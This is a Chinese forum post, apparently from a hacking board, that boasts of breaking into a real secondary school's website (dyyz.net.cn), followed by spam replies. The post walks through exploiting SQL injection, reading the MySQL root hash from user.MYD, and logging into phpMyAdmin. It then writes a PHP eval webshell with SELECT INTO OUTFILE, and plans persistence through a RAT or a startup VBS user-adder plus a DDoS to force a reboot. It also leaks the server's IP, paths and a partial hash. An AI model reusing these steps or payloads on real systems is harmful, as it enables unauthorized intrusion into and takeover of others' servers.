友情检测"湖北省大治市第一中学"

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏

发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
47---- F(0046)
48---- F(0046)
49---- 4(0034)
50---- F(0046)
51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
60---- *(0041)
61---- *0032)

解密后成功登陆phpmyamin

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权成员-------------------------------------------------------------------------------
admin
Administrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

浅灬怅_-_正在输

哥最近喜欢上了顶贴，因为，如果帖子火了，那有哥的功劳。如果帖子被顶沉了....哥也会很有成就感...因为是哥搞沉的~~大家切记~不要迷恋哥~哥只是一个传说  

震仪材

我帮你 喝喝  

随便

慢慢来，呵呵  

增加外链1元1条

说的不错  

西西洋洋

要不我崇拜你?行吗?  

滚粗可好？

给我一个女人，我可以创造一个民族；给我一瓶酒，我可以带领他们征服全世界 。。。。。。。。。  

节操可以吃

哦...............  

石南---@偷渡客

不错，支持下  

阿伏加德罗

一个个全都骑到老大头上来了...